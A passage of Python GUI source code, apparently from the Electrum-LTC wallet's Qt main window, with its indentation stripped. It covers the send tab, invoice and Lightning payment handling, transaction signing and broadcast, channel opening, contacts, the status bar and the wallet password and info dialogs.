msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except (MultipleSpendMaxTxOutputs, NotEnoughFunds) as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Litecoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
self.wallet.lnworker.pay(invoice, amount_msat=amount_msat, attempts=attempts)
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
req = self.wallet.get_invoice(key)
if req is None:
return
self.invoice_list.update_item(key, req)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
self.show_message(_('Not Enough Funds'))
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit()
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning() and self.network:
self.lightning_button = StatusBarButton(read_QIcon("lightning_disconnected.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network.lngossip is None:
return
# display colorful lightning icon to signal connection
self.lightning_button.setIcon(read_QIcon("lightning.png"))
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 4 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum_ltc.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey))
local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse)
grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0)
grid.addWidget(local_nodeid, 6, 1, 1, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
